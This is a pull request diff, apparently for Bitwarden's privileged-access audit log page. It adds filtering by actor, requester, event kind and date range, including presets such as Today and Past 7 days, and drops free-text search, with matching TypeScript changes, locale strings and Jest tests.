### PR TITLE
Filter the PAM audit log by actor, requester and date range

### DIFF
--- a/apps/web/src/locales/en/messages.json
+++ b/apps/web/src/locales/en/messages.json
@@ -18156,6 +18156,18 @@
   "pamRequestAccessButton": {
     "message": "Request access"
   },
+  "pamRequestSlotTaken": {
+    "message": "Someone else has access to this item right now. You can request access, but you won't be able to start it until they're done."
+  },
+  "pamRequestSlotTakenUntil": {
+    "message": "Someone else has access to this item right now. You can request access, but you won't be able to start it until $TIME$.",
+    "placeholders": {
+      "time": {
+        "content": "$1",
+        "example": "8/31/26, 10:52 AM"
+      }
+    }
+  },
   "cipherLeaseExpiresIn": {
     "message": "Leased — expires in $DURATION$",
     "placeholders": {

--- a/apps/web/src/locales/en/messages.json
+++ b/apps/web/src/locales/en/messages.json
@@ -17982,9 +17982,6 @@
   "pamAuditNoMatchesMessage": {
     "message": "No events match the current filters."
   },
-  "pamAuditColumnTime": {
-    "message": "Time"
-  },
   "pamAuditColumnEvent": {
     "message": "Event"
   },

--- a/apps/web/src/locales/en/messages.json
+++ b/apps/web/src/locales/en/messages.json
@@ -17976,9 +17976,6 @@
   "pamAuditEmptyMessage": {
     "message": "Privileged-access activity in this organization will appear here."
   },
-  "pamAuditSearchPlaceholder": {
-    "message": "Search the audit log"
-  },
   "pamAuditNoMatchesTitle": {
     "message": "No matching events"
   },

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -23,6 +23,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     requesterId: "user-alice",
     requesterEmail: "alice@example.com",
     cipherName: "prod db",
+    cipherId: "cipher-1",
     collectionName: "production",
     ruleName: null,
     detail: null,
@@ -189,7 +190,43 @@ describe("toAuditRow", () => {
 
     expect(result.ruleName).toBe("prod-rule");
     expect(result.cipherName).toBeNull();
+    expect(result.cipherId).toBeNull();
     expect(result.inDoubt).toBe(false);
+  });
+
+  it("carries the subject cipher's id beside its decrypted name", () => {
+    const event = new AccessAuditEventResponse({
+      Kind: AccessAuditEventKind.CredentialAccessed,
+      OccurredAt: "2026-06-30T12:00:00Z",
+      OrganizationId: "org-1",
+      ActorName: "Ada",
+      CipherId: "cipher-1",
+      CollectionId: "col-1",
+      Automated: false,
+    });
+
+    const result = toAuditRow(event, new Map([["cipher-1", "prod db"]]), new Map());
+
+    expect(result.cipherId).toBe("cipher-1");
+    expect(result.cipherName).toBe("prod db");
+  });
+
+  // The id rides on the row whether or not the item decrypted, but the Item cell only links a row that
+  // has a name to render as the link text.
+  it("carries the subject cipher's id even when the item did not decrypt", () => {
+    const event = new AccessAuditEventResponse({
+      Kind: AccessAuditEventKind.CredentialAccessed,
+      OccurredAt: "2026-06-30T12:00:00Z",
+      OrganizationId: "org-1",
+      ActorName: "Ada",
+      CipherId: "cipher-9",
+      Automated: false,
+    });
+
+    const result = toAuditRow(event, new Map(), new Map());
+
+    expect(result.cipherId).toBe("cipher-9");
+    expect(result.cipherName).toBeNull();
   });
 
   it("marks a row in-doubt when the event is incomplete", () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -32,48 +32,23 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     duration: null,
     exactWindow: null,
     extendedUntil: null,
-    searchText: "alice alice prod db production",
     ...overrides,
   };
 }
 
 describe("auditRowMatchesFilter", () => {
-  const unfiltered: AuditFilter = { text: "", kindLabelKey: null };
+  const unfiltered: AuditFilter = { kindLabelKey: null };
 
   it("matches everything when the filter is empty", () => {
-    expect(auditRowMatchesFilter(row(), { text: "", kindLabelKey: null })).toBe(true);
-  });
-
-  it("matches free text against the haystack, case-insensitively", () => {
-    expect(auditRowMatchesFilter(row(), { text: "PROD", kindLabelKey: null })).toBe(true);
-    expect(auditRowMatchesFilter(row(), { text: "  production ", kindLabelKey: null })).toBe(true);
-    expect(auditRowMatchesFilter(row(), { text: "staging", kindLabelKey: null })).toBe(false);
+    expect(auditRowMatchesFilter(row(), { kindLabelKey: null })).toBe(true);
   });
 
   it("filters by event-kind label key", () => {
     const deleted = row({ kindLabelKey: "pamAuditKindRuleDeleted" });
-    expect(
-      auditRowMatchesFilter(deleted, { text: "", kindLabelKey: "pamAuditKindRuleDeleted" }),
-    ).toBe(true);
-    expect(
-      auditRowMatchesFilter(deleted, { text: "", kindLabelKey: "pamAuditKindRequestSubmitted" }),
-    ).toBe(false);
-  });
-
-  it("requires both text and kind to match when both are set", () => {
-    const revoked = row({ kindLabelKey: "pamAuditKindLeaseRevoked", searchText: "bob server" });
-    expect(
-      auditRowMatchesFilter(revoked, { text: "bob", kindLabelKey: "pamAuditKindLeaseRevoked" }),
-    ).toBe(true);
-    expect(
-      auditRowMatchesFilter(revoked, {
-        text: "bob",
-        kindLabelKey: "pamAuditKindRequestSubmitted",
-      }),
-    ).toBe(false);
-    expect(
-      auditRowMatchesFilter(revoked, { text: "carol", kindLabelKey: "pamAuditKindLeaseRevoked" }),
-    ).toBe(false);
+    expect(auditRowMatchesFilter(deleted, { kindLabelKey: "pamAuditKindRuleDeleted" })).toBe(true);
+    expect(auditRowMatchesFilter(deleted, { kindLabelKey: "pamAuditKindRequestSubmitted" })).toBe(
+      false,
+    );
   });
 
   it("filters by actor identity, not by the name the cell renders", () => {
@@ -138,11 +113,9 @@ describe("auditRowMatchesFilter", () => {
       kindLabelKey: "pamAuditKindLeaseRevoked",
       actorId: "user-ada",
       requesterId: "user-bob",
-      searchText: "ada bob prod db",
       occurredAt: new Date("2026-06-30T12:00:00Z"),
     });
     const all = {
-      text: "prod",
       kindLabelKey: "pamAuditKindLeaseRevoked",
       actorId: "user-ada",
       requesterId: "user-bob",
@@ -153,7 +126,6 @@ describe("auditRowMatchesFilter", () => {
     expect(auditRowMatchesFilter(target, all)).toBe(true);
     expect(auditRowMatchesFilter(target, { ...all, actorId: "user-alice" })).toBe(false);
     expect(auditRowMatchesFilter(target, { ...all, requesterId: "user-alice" })).toBe(false);
-    expect(auditRowMatchesFilter(target, { ...all, text: "staging" })).toBe(false);
     expect(auditRowMatchesFilter(target, { ...all, from: new Date("2026-06-30T12:30:00Z") })).toBe(
       false,
     );
@@ -217,7 +189,6 @@ describe("toAuditRow", () => {
 
     expect(result.ruleName).toBe("prod-rule");
     expect(result.cipherName).toBeNull();
-    expect(result.searchText).toContain("prod-rule");
     expect(result.inDoubt).toBe(false);
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -27,6 +27,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     cipherId: "cipher-1",
     collectionName: "production",
     ruleName: null,
+    ruleId: null,
     detail: null,
     automated: false,
     inDoubt: false,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -26,6 +26,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     cipherName: "prod db",
     cipherId: "cipher-1",
     collectionName: "production",
+    collectionId: "collection-1",
     ruleName: null,
     ruleId: null,
     detail: null,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -1,4 +1,12 @@
-import { AuditRow, auditRowMatchesFilter, toAuditRow } from "./access-audit-row";
+import {
+  AUTOMATED_ACTOR,
+  AuditFilter,
+  AuditRow,
+  auditRangeEnd,
+  auditRangeStart,
+  auditRowMatchesFilter,
+  toAuditRow,
+} from "./access-audit-row";
 import {
   AccessAuditEventKind,
   AccessAuditEventResponse,
@@ -9,7 +17,9 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     occurredAt: new Date("2026-06-30T12:00:00Z"),
     kindLabelKey: "pamAuditKindRequestSubmitted",
     actor: "alice",
+    actorId: "user-alice",
     requester: "alice",
+    requesterId: "user-alice",
     cipherName: "prod db",
     collectionName: "production",
     ruleName: null,
@@ -26,6 +36,8 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
 }
 
 describe("auditRowMatchesFilter", () => {
+  const unfiltered: AuditFilter = { text: "", kindLabelKey: null };
+
   it("matches everything when the filter is empty", () => {
     expect(auditRowMatchesFilter(row(), { text: "", kindLabelKey: null })).toBe(true);
   });
@@ -61,9 +73,131 @@ describe("auditRowMatchesFilter", () => {
       auditRowMatchesFilter(revoked, { text: "carol", kindLabelKey: "pamAuditKindLeaseRevoked" }),
     ).toBe(false);
   });
+
+  it("filters by actor identity, not by the name the cell renders", () => {
+    const namesake = row({ actor: "J. Smith", actorId: "user-2" });
+
+    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: "user-2" })).toBe(true);
+    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+  });
+
+  it("filters by requester identity", () => {
+    const forBob = row({ requester: "bob", requesterId: "user-bob" });
+
+    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: "user-bob" })).toBe(true);
+    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: "user-alice" })).toBe(false);
+  });
+
+  it("puts automated rows in their own actor bucket, and only those", () => {
+    const automated = row({ actor: null, actorId: null, automated: true });
+
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: AUTOMATED_ACTOR })).toBe(
+      true,
+    );
+    expect(auditRowMatchesFilter(row(), { ...unfiltered, actorId: AUTOMATED_ACTOR })).toBe(false);
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+  });
+
+  it("keeps an automated row out of a human bucket even when the wire carried an actor id", () => {
+    const automated = row({ actorId: "user-alice", automated: true });
+
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+  });
+
+  it("bounds the range inclusively at both ends", () => {
+    const at12 = row({ occurredAt: new Date("2026-06-30T12:00:00Z") });
+
+    expect(
+      auditRowMatchesFilter(at12, { ...unfiltered, from: new Date("2026-06-30T12:00:00Z") }),
+    ).toBe(true);
+    expect(
+      auditRowMatchesFilter(at12, { ...unfiltered, to: new Date("2026-06-30T12:00:00Z") }),
+    ).toBe(true);
+    expect(
+      auditRowMatchesFilter(at12, { ...unfiltered, from: new Date("2026-06-30T12:00:00.001Z") }),
+    ).toBe(false);
+    expect(
+      auditRowMatchesFilter(at12, { ...unfiltered, to: new Date("2026-06-30T11:59:59.999Z") }),
+    ).toBe(false);
+  });
+
+  it("matches nothing when the range is inverted", () => {
+    expect(
+      auditRowMatchesFilter(row(), {
+        ...unfiltered,
+        from: new Date("2026-06-30T13:00:00Z"),
+        to: new Date("2026-06-30T11:00:00Z"),
+      }),
+    ).toBe(false);
+  });
+
+  it("requires every dimension to match when all of them are set", () => {
+    const target = row({
+      kindLabelKey: "pamAuditKindLeaseRevoked",
+      actorId: "user-ada",
+      requesterId: "user-bob",
+      searchText: "ada bob prod db",
+      occurredAt: new Date("2026-06-30T12:00:00Z"),
+    });
+    const all = {
+      text: "prod",
+      kindLabelKey: "pamAuditKindLeaseRevoked",
+      actorId: "user-ada",
+      requesterId: "user-bob",
+      from: new Date("2026-06-30T11:00:00Z"),
+      to: new Date("2026-06-30T13:00:00Z"),
+    };
+
+    expect(auditRowMatchesFilter(target, all)).toBe(true);
+    expect(auditRowMatchesFilter(target, { ...all, actorId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(target, { ...all, requesterId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(target, { ...all, text: "staging" })).toBe(false);
+    expect(auditRowMatchesFilter(target, { ...all, from: new Date("2026-06-30T12:30:00Z") })).toBe(
+      false,
+    );
+  });
+});
+
+describe("audit range bounds", () => {
+  it("reads a datetime-local value in the viewer's own zone", () => {
+    const start = auditRangeStart("2026-06-30T09:00");
+
+    expect(start).toEqual(new Date(2026, 5, 30, 9, 0));
+  });
+
+  it("carries the end bound to the end of its minute, as the Time column's rendering implies", () => {
+    const end = auditRangeEnd("2026-06-30T09:00");
+
+    expect(end).toEqual(new Date(2026, 5, 30, 9, 0, 59, 999));
+  });
+
+  it("leaves a blank or unparseable bound unbounded", () => {
+    expect(auditRangeStart("")).toBeNull();
+    expect(auditRangeEnd("")).toBeNull();
+    expect(auditRangeStart("not a date")).toBeNull();
+  });
 });
 
 describe("toAuditRow", () => {
+  it("carries the actor and requester identities the chips filter on", () => {
+    const event = new AccessAuditEventResponse({
+      Kind: AccessAuditEventKind.RequestApproved,
+      OccurredAt: "2026-06-30T12:00:00Z",
+      OrganizationId: "org-1",
+      ActorId: "user-ada",
+      ActorName: "Ada",
+      RequesterId: "user-bob",
+      RequesterEmail: "bob@example.com",
+      Automated: false,
+    });
+
+    const result = toAuditRow(event, new Map(), new Map());
+
+    expect(result.actorId).toBe("user-ada");
+    expect(result.requesterId).toBe("user-bob");
+    expect(result.requester).toBe("bob@example.com");
+  });
+
   it("shows the rule name as the item for a rule administration event", () => {
     const event = new AccessAuditEventResponse({
       Kind: AccessAuditEventKind.RuleCreated,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -47,8 +47,10 @@ describe("auditRowMatchesFilter", () => {
 
   it("filters by event-kind label key", () => {
     const deleted = row({ kindLabelKey: "pamAuditKindRuleDeleted" });
-    expect(auditRowMatchesFilter(deleted, { kindLabelKey: "pamAuditKindRuleDeleted" })).toBe(true);
-    expect(auditRowMatchesFilter(deleted, { kindLabelKey: "pamAuditKindRequestSubmitted" })).toBe(
+    expect(auditRowMatchesFilter(deleted, { kindLabelKey: ["pamAuditKindRuleDeleted"] })).toBe(
+      true,
+    );
+    expect(auditRowMatchesFilter(deleted, { kindLabelKey: ["pamAuditKindRequestSubmitted"] })).toBe(
       false,
     );
   });
@@ -56,31 +58,37 @@ describe("auditRowMatchesFilter", () => {
   it("filters by actor identity, not by the name the cell renders", () => {
     const namesake = row({ actor: "J. Smith", actorId: "user-2" });
 
-    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: "user-2" })).toBe(true);
-    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: ["user-2"] })).toBe(true);
+    expect(auditRowMatchesFilter(namesake, { ...unfiltered, actorId: ["user-alice"] })).toBe(false);
   });
 
   it("filters by requester identity", () => {
     const forBob = row({ requester: "bob", requesterId: "user-bob" });
 
-    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: "user-bob" })).toBe(true);
-    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: ["user-bob"] })).toBe(true);
+    expect(auditRowMatchesFilter(forBob, { ...unfiltered, requesterId: ["user-alice"] })).toBe(
+      false,
+    );
   });
 
   it("puts automated rows in their own actor bucket, and only those", () => {
     const automated = row({ actor: null, actorId: null, automated: true });
 
-    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: AUTOMATED_ACTOR })).toBe(
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: [AUTOMATED_ACTOR] })).toBe(
       true,
     );
-    expect(auditRowMatchesFilter(row(), { ...unfiltered, actorId: AUTOMATED_ACTOR })).toBe(false);
-    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(row(), { ...unfiltered, actorId: [AUTOMATED_ACTOR] })).toBe(false);
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: ["user-alice"] })).toBe(
+      false,
+    );
   });
 
   it("keeps an automated row out of a human bucket even when the wire carried an actor id", () => {
     const automated = row({ actorId: "user-alice", automated: true });
 
-    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(automated, { ...unfiltered, actorId: ["user-alice"] })).toBe(
+      false,
+    );
   });
 
   it("bounds the range inclusively at both ends", () => {
@@ -118,16 +126,16 @@ describe("auditRowMatchesFilter", () => {
       occurredAt: new Date("2026-06-30T12:00:00Z"),
     });
     const all = {
-      kindLabelKey: "pamAuditKindLeaseRevoked",
-      actorId: "user-ada",
-      requesterId: "user-bob",
+      kindLabelKey: ["pamAuditKindLeaseRevoked"],
+      actorId: ["user-ada"],
+      requesterId: ["user-bob"],
       from: new Date("2026-06-30T11:00:00Z"),
       to: new Date("2026-06-30T13:00:00Z"),
     };
 
     expect(auditRowMatchesFilter(target, all)).toBe(true);
-    expect(auditRowMatchesFilter(target, { ...all, actorId: "user-alice" })).toBe(false);
-    expect(auditRowMatchesFilter(target, { ...all, requesterId: "user-alice" })).toBe(false);
+    expect(auditRowMatchesFilter(target, { ...all, actorId: ["user-alice"] })).toBe(false);
+    expect(auditRowMatchesFilter(target, { ...all, requesterId: ["user-alice"] })).toBe(false);
     expect(auditRowMatchesFilter(target, { ...all, from: new Date("2026-06-30T12:30:00Z") })).toBe(
       false,
     );

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -216,11 +216,8 @@ describe("toAuditRow", () => {
     const result = toAuditRow(event, new Map(), new Map());
 
     expect(result.ruleName).toBe("prod-rule");
-    // A rule event has no cipher, so the item falls back to the rule name.
     expect(result.cipherName).toBeNull();
-    // The rule name is part of the free-text search haystack.
     expect(result.searchText).toContain("prod-rule");
-    // A completed event (no Incomplete flag) is not in-doubt.
     expect(result.inDoubt).toBe(false);
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -18,8 +18,10 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     kindLabelKey: "pamAuditKindRequestSubmitted",
     actor: "alice",
     actorId: "user-alice",
+    actorEmail: "alice@example.com",
     requester: "alice",
     requesterId: "user-alice",
+    requesterEmail: "alice@example.com",
     cipherName: "prod db",
     collectionName: "production",
     ruleName: null,
@@ -186,6 +188,7 @@ describe("toAuditRow", () => {
       OrganizationId: "org-1",
       ActorId: "user-ada",
       ActorName: "Ada",
+      ActorEmail: "ada@example.com",
       RequesterId: "user-bob",
       RequesterEmail: "bob@example.com",
       Automated: false,
@@ -194,7 +197,9 @@ describe("toAuditRow", () => {
     const result = toAuditRow(event, new Map(), new Map());
 
     expect(result.actorId).toBe("user-ada");
+    expect(result.actorEmail).toBe("ada@example.com");
     expect(result.requesterId).toBe("user-bob");
+    expect(result.requesterEmail).toBe("bob@example.com");
     expect(result.requester).toBe("bob@example.com");
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -32,6 +32,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     automated: false,
     inDoubt: false,
     requestId: null,
+    leaseId: null,
     duration: null,
     exactWindow: null,
     extendedUntil: null,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.spec.ts
@@ -2,6 +2,7 @@ import {
   AUTOMATED_ACTOR,
   AuditFilter,
   AuditRow,
+  auditPresetRange,
   auditRangeEnd,
   auditRangeStart,
   auditRowMatchesFilter,
@@ -307,5 +308,48 @@ describe("toAuditRow", () => {
     expect(result.duration).toBeNull();
     expect(result.exactWindow).toBeNull();
     expect(result.extendedUntil).toBeNull();
+  });
+});
+
+describe("auditPresetRange", () => {
+  /** Mid-afternoon local time, so "today" and "the last 24 hours" are two different windows. */
+  const now = new Date(2026, 7, 18, 15, 30, 45, 123);
+
+  it("starts Today at midnight local, not twenty-four hours back", () => {
+    const range = auditPresetRange("today", now);
+
+    expect(range.from).toEqual(new Date(2026, 7, 18, 0, 0, 0, 0));
+    expect(range.to).toBeNull();
+  });
+
+  it("starts Past 7 days seven days before the moment it is read", () => {
+    const range = auditPresetRange("past7Days", now);
+
+    expect(range.from).toEqual(new Date(2026, 7, 11, 15, 30, 45, 123));
+    expect(range.to).toBeNull();
+  });
+
+  it("starts Past 30 days thirty days before the moment it is read", () => {
+    const range = auditPresetRange("past30Days", now);
+
+    expect(range.from).toEqual(new Date(2026, 6, 19, 15, 30, 45, 123));
+    expect(range.to).toBeNull();
+  });
+
+  // The whole fetched trail, which is the 90-day window the endpoint serves — not all history.
+  it("bounds All time on neither side", () => {
+    expect(auditPresetRange("allTime", now)).toEqual({ from: null, to: null });
+  });
+
+  // Custom takes its bounds from the dialog, never from the clock.
+  it("bounds Custom on neither side", () => {
+    expect(auditPresetRange("custom", now)).toEqual({ from: null, to: null });
+  });
+
+  it("leaves an unbounded preset matching every row", () => {
+    const range = auditPresetRange("allTime", now);
+    const filter: AuditFilter = { kindLabelKey: null, from: range.from, to: range.to };
+
+    expect(auditRowMatchesFilter(row({ occurredAt: new Date(1999, 0, 1) }), filter)).toBe(true);
   });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -33,6 +33,11 @@ export type AuditRow = {
   cipherId: string | null;
   /** Decrypted collection name from local vault state, or null. */
   collectionName: string | null;
+  /**
+   * The subject collection, when the event names one — the identity behind a collection the drawer can
+   * open the organization vault on.
+   */
+  collectionId: string | null;
   /** The access rule's name (plaintext, provided by the server), for rule administration events; null otherwise. */
   ruleName: string | null;
   /** The subject access rule, when the event names one — the identity behind a rule-named Item cell. */
@@ -153,6 +158,7 @@ export function toAuditRow(
     cipherName,
     cipherId: event.cipherId,
     collectionName,
+    collectionId: event.collectionId,
     ruleName: event.ruleName,
     ruleId: event.ruleId,
     detail: event.detail,
@@ -188,6 +194,18 @@ export function auditItemId(row: AuditRow): string | null {
 /** The label the Item cell renders for a row, or null when it renders no item. */
 export function auditItemLabel(row: AuditRow): string | null {
   return row.cipherName ?? row.ruleName;
+}
+
+/**
+ * Whether the event destroyed the rule it names.
+ *
+ * The audit store snapshots {@link AuditRow.ruleName} at write time, so such a row still reads as a name
+ * long after the rule itself is gone — and the rule editor's route would answer that name with a 404 on
+ * the very event an auditor is most likely to follow. Read off the label key rather than the wire kind
+ * because that is what the row carries once shaped.
+ */
+export function auditRuleDeleted(row: AuditRow): boolean {
+  return row.kindLabelKey === auditKindLabelKey(AccessAuditEventKind.RuleDeleted);
 }
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -191,6 +191,53 @@ export function auditRangeEnd(value: string): Date | null {
   return start == null ? null : new Date(start.getTime() + END_OF_MINUTE_MS);
 }
 
+/** An audit date range. A null bound is unbounded on that side. */
+export type AuditRange = { from: Date | null; to: Date | null };
+
+export const UNBOUNDED_AUDIT_RANGE: AuditRange = { from: null, to: null };
+
+/**
+ * A choice in the Time period filter.
+ *
+ * `allTime` is the whole fetched trail, not all of history: `GET /organizations/{orgId}/audit` serves a
+ * fixed 90-day window and takes no parameters, so nothing older than that window is on the client for any
+ * option here to show.
+ */
+export type AuditTimePeriod = "today" | "past7Days" | "past30Days" | "allTime" | "custom";
+
+/** The Time period options that carry their own bounds, in menu order. */
+export const AUDIT_TIME_PRESETS: readonly AuditTimePeriod[] = ["today", "past7Days", "past30Days"];
+
+export const AUDIT_TIME_PERIOD_LABEL_KEYS: Record<AuditTimePeriod, string> = {
+  today: "recentlyActiveToday",
+  past7Days: "recentlyActivePast7Days",
+  past30Days: "recentlyActivePast30Days",
+  allTime: "allTime",
+  custom: "custom",
+};
+
+const DAY_MS = 24 * 60 * 60 * 1000;
+
+/**
+ * The bounds a preset stands for, measured against `now`.
+ *
+ * Local time throughout, matching the Time column's `date` pipe: "Today" is the start of the auditor's own
+ * day rather than the last 24 hours, so an event at 08:00 this morning is in it and one at 22:00 last night
+ * is not. `allTime` carries no bounds, and `custom` takes its bounds from the dialog instead.
+ */
+export function auditPresetRange(period: AuditTimePeriod, now: Date): AuditRange {
+  switch (period) {
+    case "today":
+      return { from: new Date(now.getFullYear(), now.getMonth(), now.getDate()), to: null };
+    case "past7Days":
+      return { from: new Date(now.getTime() - 7 * DAY_MS), to: null };
+    case "past30Days":
+      return { from: new Date(now.getTime() - 30 * DAY_MS), to: null };
+    default:
+      return UNBOUNDED_AUDIT_RANGE;
+  }
+}
+
 /** The active audit-log filter. Every dimension is independent, and an unset one matches everything. */
 export type AuditFilter = {
   kindLabelKey: string | null;

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -19,10 +19,14 @@ export type AuditRow = {
   actor: string | null;
   /** Who performed it, as an identity — the actor filter keys on this, since two members can share a display name. */
   actorId: string | null;
+  /** The actor's email, used to tell apart two identities whose display names collide. */
+  actorEmail: string | null;
   /** The access requester (name, falling back to email). */
   requester: string | null;
   /** The access requester, as an identity — see {@link AuditRow.actorId}. */
   requesterId: string | null;
+  /** The requester's email — see {@link AuditRow.actorEmail}. */
+  requesterEmail: string | null;
   /** Decrypted cipher name from local vault state, or null when the item isn't in the caller's vault. */
   cipherName: string | null;
   /** Decrypted collection name from local vault state, or null. */
@@ -135,8 +139,10 @@ export function toAuditRow(
     kindLabelKey: selfEnded ? "pamAuditKindLeaseEndedByHolder" : auditKindLabelKey(event.kind),
     actor,
     actorId: event.actorId,
+    actorEmail: event.actorEmail,
     requester,
     requesterId: event.requesterId,
+    requesterEmail: event.requesterEmail,
     cipherName,
     collectionName,
     ruleName: event.ruleName,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -163,40 +163,29 @@ export const AUTOMATED_ACTOR = "automated";
 const END_OF_MINUTE_MS = 59_999;
 
 /**
- * Read a `datetime-local` value as an instant in the viewer's own zone, so a bound typed as 09:00 means
- * 09:00 where the auditor is sitting — the same zone the Time column's `date` pipe renders in. Built from
- * the parts rather than handed to `Date.parse`, which reads a *date-only* string as UTC and only this
- * date-time form as local.
+ * The lower bound of an audit date range, from a `datetime-local` value. Blank or unparseable means unbounded.
+ *
+ * Read as an instant in the viewer's own zone, so a bound typed as 09:00 means 09:00 where the auditor is
+ * sitting — the same zone the Time column's `date` pipe renders in. Built from the parts rather than handed
+ * to `Date.parse`, which reads a *date-only* string as UTC and only this date-time form as local.
  */
-function parseLocalDateTime(value: string): Date | null {
+export function auditRangeStart(value: string): Date | null {
   const parts = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})/.exec(value.trim());
   if (parts == null) {
     return null;
   }
   const [, year, month, day, hour, minute] = parts;
-  const parsed = new Date(
-    Number(year),
-    Number(month) - 1,
-    Number(day),
-    Number(hour),
-    Number(minute),
-  );
-  return Number.isFinite(parsed.getTime()) ? parsed : null;
-}
-
-/** The lower bound of an audit date range, from a `datetime-local` value. Blank or unparseable means unbounded. */
-export function auditRangeStart(value: string): Date | null {
-  return parseLocalDateTime(value);
+  return new Date(Number(year), Number(month) - 1, Number(day), Number(hour), Number(minute));
 }
 
 /**
- * The upper bound of an audit date range, from a `datetime-local` value. Blank or unparseable means unbounded.
- * Carried to the end of the chosen minute, matching `EventService.formatDateFilters`, so a bound typed as 09:00
- * still admits an event recorded at 09:00:30 — which the Time column also renders as 09:00.
+ * The upper bound of an audit date range, read like {@link auditRangeStart} but carried to the end of the
+ * chosen minute, matching `EventService.formatDateFilters`, so a bound typed as 09:00 still admits an event
+ * recorded at 09:00:30 — which the Time column also renders as 09:00.
  */
 export function auditRangeEnd(value: string): Date | null {
-  const parsed = parseLocalDateTime(value);
-  return parsed == null ? null : new Date(parsed.getTime() + END_OF_MINUTE_MS);
+  const start = auditRangeStart(value);
+  return start == null ? null : new Date(start.getTime() + END_OF_MINUTE_MS);
 }
 
 /** The active audit-log filter. Every dimension is independent, and an unset one matches everything. */
@@ -217,16 +206,11 @@ export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boole
   if (filter.kindLabelKey != null && row.kindLabelKey !== filter.kindLabelKey) {
     return false;
   }
-  if (filter.actorId != null) {
-    // The Actor cell reads "System" for every automated row whatever the wire carries as its actor, so the
-    // two buckets have to split the same way that cell does.
-    const wantsAutomated = filter.actorId === AUTOMATED_ACTOR;
-    if (wantsAutomated !== row.automated) {
-      return false;
-    }
-    if (!wantsAutomated && row.actorId !== filter.actorId) {
-      return false;
-    }
+  // The Actor cell reads "System" for every automated row whatever the wire carries as its actor, so the
+  // buckets split on the effective identity that cell renders rather than on the row's own actor id.
+  const actorId = row.automated ? AUTOMATED_ACTOR : row.actorId;
+  if (filter.actorId != null && actorId !== filter.actorId) {
+    return false;
   }
   if (filter.requesterId != null && row.requesterId !== filter.requesterId) {
     return false;

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -238,30 +238,43 @@ export function auditPresetRange(period: AuditTimePeriod, now: Date): AuditRange
   }
 }
 
